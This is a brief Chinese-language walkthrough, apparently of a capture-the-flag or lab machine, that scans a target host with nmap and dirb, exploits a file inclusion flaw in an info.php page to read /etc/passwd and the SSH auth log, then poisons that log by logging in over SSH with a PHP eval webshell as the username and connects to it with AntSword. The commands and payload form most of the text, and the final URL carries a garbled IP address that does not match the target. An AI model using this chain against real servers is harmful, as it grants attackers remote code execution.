1.扫描端口
nmap -A -p- 172.16.1.113
2.敏感目录扫描
dirb http://172.16.1.113/
3.访问敏感目录
http://172.16.1.113/antibot_image/
4.在antibots目录下找到一个info.php文件
5.访问info.php
允许远程读取URL文件,但是不允许包含URL文件,可以进行利用
6.查看源码,提示可以传参,存在文件包含漏洞。
7.页面通过image传参查看passwd文件
8.页面通过image传参查看日志文件
该文件还记录了ssh登录的登录日志
9.将一句话木马作为ssh登录的用户名登录
ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211
将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。
10.蚁剑连接
URL地址:http://192.168.192.168.168.131/antibot_image/antibots/info.php?image=../../../../../../../var/log/auth.log
密码:cmd